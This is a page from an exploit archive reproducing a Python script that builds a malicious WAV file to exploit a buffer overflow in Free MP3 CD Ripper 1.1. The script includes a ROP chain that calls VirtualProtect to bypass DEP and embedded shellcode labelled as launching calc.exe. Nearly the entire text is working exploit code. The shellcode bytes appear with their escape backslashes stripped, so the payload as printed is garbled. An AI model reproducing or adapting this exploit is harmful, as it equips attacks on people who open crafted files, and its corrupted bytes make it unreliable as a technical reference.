[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free MP3 CD Ripper 1.1 DEP Bypass Exploit
# Published : 2011-08-27
# Author :
# Previous Title : Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)
# Next Title : ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
#!/usr/bin/python
#
#[+]Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit
#[+]Date: 27�82011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
#[+]Found/Initial Exploit: X-h4ck(http://www.exploit-db.com/exploits/17727/)
#[+]Version: 1.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
from struct import pack
from time import sleep
import os
from sys import exit
print '''
Created By C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com
'''
sleep(2)
shellcode = ("xddxc3xd9x74x24xf4x5bx29xc9xb1x32xb8x08x99"
"xc4xb4x31x43x17x03x43x17x83xcbx9dx26x41x37"
"x75x2fxaaxc7x86x50x22x22xb7x42x50x27xeax52"
"x12x65x07x18x76x9dx9cx6cx5fx92x15xdaxb9x9d"
"xa6xeax05x71x64x6cxfax8bxb9x4exc3x44xccx8f" # Shellcode WinExec "Calc.exe"
"x04xb8x3fxddxddxb7x92xf2x6ax85x2exf2xbcx82" # BadChars "x00x0ax0d"
"x0fx8cxb9x54xfbx26xc3x84x54x3cx8bx3cxdex1a"
"x2cx3dx33x79x10x74x38x4axe2x87xe8x82x0bxb6"
"xd4x49x32x77xd9x90x72xbfx02xe7x88xbcxbfxf0"
"x4axbfx1bx74x4fx67xefx2exabx96x3cxa8x38x94"
"x89xbex67xb8x0cx12x1cxc4x85x95xf3x4dxddxb1"
"xd7x16x85xd8x4exf2x68xe4x91x5axd4x40xd9x48"
"x01xf2x80x06xd4x76xbfx6fxd6x88xc0xdfxbfxb9"
"x4bxb0xb8x45x9exf5x37x0cx83x5fxd0xc9x51xe2"
"xbdxe9x8fx20xb8x69x3axd8x3fx71x4fxddx04x35"
"xa3xafx15xd0xc3x1cx15xf1xa7xc3x85x99x27")
#######################ROP START HERE#######################################
rop = pack('<L',0x6f483d9b) # PUSH ESP # POP EBP # RETN
rop += pack('<L',0x004a7252) # XCHG EAX,EBP # RETN
rop += pack('<L',0x0047855b) # XCHG EAX,ECX # RETN
rop += pack('<L',0x00494277) # POP EAX # RETN
rop += pack('<L',0x00CA2108) # PTR to VirtualProtect
rop += pack('<L',0x10007584) # POP EDI # RETN
rop += pack('<L',0x00493b99) # RETN
rop += pack('<L',0x10013cb1) # POP ESI # RETN
rop += pack('<L',0x00C81C02) # PTR to JMP[EAX]
rop += pack('<L',0x00453cc7) # POP EBP # RETN
rop += pack('<L',0x100081cd) # ADD ESP,24 # RETN // Return of function VirtualProtect
rop += pack('<L',0x00493b98) # POP EBX # RETN
rop += pack('<L',0x000000db) # Valor de dwSize
rop += pack('<L',0x004b0609) # POP EDX # RETN
rop += pack('<L',0x00000040) # Valor de flNewProtect
rop += pack('<L',0x004c8dc0) # PUSHAD # RETN
rop += ("A" * 32)
rop += pack('<L',0x00463BE9) # JMP to Shellcode
#######################ROP END HERE#########################################
#Note:
#Here we have control of 219 bytes of memory, is not a good space. :)
#So our solution would be: call the function VirtualProtect pointing to inicion 4112 bytes of the file.
#Now that control the 219-byte one, a good space
#to a function call VirtualProtect and its parameter. ;)
############################################################################
buf = ("x90" * 50)
buf += shellcode
buf += ("A" * (4112-len(buf)))
buf += rop
buf += (
"x54" # PUSH ESP
"x6Ax40" # PUSH 40
"x66xB8x50x10" # MOV AX,1050
"x50" # PUSH EAX
"x8BxCC" # MOV ECX,ESP
"x2BxC8" # SUB ECX,EAX
"x8BxD9" # MOV EBX,ECX
"x51" # PUSH ECX
"xFFx15x08x21xCAx00" # CALL DWORD PTR DS:[Kernel32.VirtualProtect]
"xFFxD3") # CALL EBX // Jmp to My Shellcode after call VirtualProtect
print "tt[+]Creating Exploit File..."
sleep(1)
try:
f = open("Exploit.wav","wb")
f.write(buf)
f.close()
print "tt[+]File "Exploit.wav" Created Succefully."
sleep(1)
except IOError,e:
print "tt[+]Error: "+str(e)
exit(-1)